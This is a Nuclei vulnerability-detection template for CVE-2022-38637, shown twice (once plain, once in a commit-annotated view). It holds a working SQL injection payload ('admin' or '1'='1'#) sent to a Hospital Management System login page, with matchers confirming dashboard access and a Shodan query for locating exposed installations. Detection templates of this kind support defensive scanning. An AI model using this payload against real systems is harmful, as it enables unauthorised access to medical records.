nuclei-templates/cves/2022/CVE-2022-38637.yaml

id: CVE-2022-38637

info:
  name: Hospital Management System v1.0 - SQL Injection
  author: arafatansari
  severity: high
  description: |
    Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php.
  reference:
    - https://www.youtube.com/watch?v=m8nW0p69UHU
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38637
    - https://owasp.org/www-community/attacks/SQL_Injection
  classification:
    cve-id: CVE-2022-38637
  metadata:
    shodan-query: http.html:"Hospital Management System"
    verified: "true"
  tags: cve,cve2022,hms,cms,sqli,auth-bypass

requests:
  - raw:
      - |
        POST /hms/user-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=

    redirects: true
    max-redirects: 2
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>User  | Dashboard</title>'
          - 'Book My Appointment'
        condition: and

      - type: status
        status:
          - 200
Create CVE-2022-38637.yaml 2022-09-14 12:55:38 +00:00			`id: CVE-2022-38637`

			`info:`
			`name: Hospital Management System v1.0 - SQL Injection`
			`author: arafatansari`
			`severity: high`
			`description: \|`
			`Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/user-login.php.`
			`reference:`
Update CVE-2022-38637.yaml 2022-09-14 14:50:36 +00:00			`- https://www.youtube.com/watch?v=m8nW0p69UHU`
Create CVE-2022-38637.yaml 2022-09-14 12:55:38 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-38637`
Auto Generated CVE annotations [Thu Sep 15 12:24:00 UTC 2022] :robot: 2022-09-15 12:24:00 +00:00			`- https://owasp.org/www-community/attacks/SQL_Injection`
Update CVE-2022-38637.yaml 2022-09-14 14:50:36 +00:00			`classification:`
			`cve-id: CVE-2022-38637`
Create CVE-2022-38637.yaml 2022-09-14 12:55:38 +00:00			`metadata:`
			`shodan-query: http.html:"Hospital Management System"`
Auto Generated CVE annotations [Thu Sep 15 12:24:00 UTC 2022] :robot: 2022-09-15 12:24:00 +00:00			`verified: "true"`
Update CVE-2022-38637.yaml 2022-09-14 14:50:36 +00:00			`tags: cve,cve2022,hms,cms,sqli,auth-bypass`
Create CVE-2022-38637.yaml 2022-09-14 12:55:38 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /hms/user-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=`

			`redirects: true`
			`max-redirects: 2`
			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2022-38637.yaml 2022-09-14 14:50:36 +00:00			`- '<title>User \| Dashboard</title>'`
			`- 'Book My Appointment'`
			`condition: and`
Create CVE-2022-38637.yaml 2022-09-14 12:55:38 +00:00
			`- type: status`
			`status:`
			`- 200`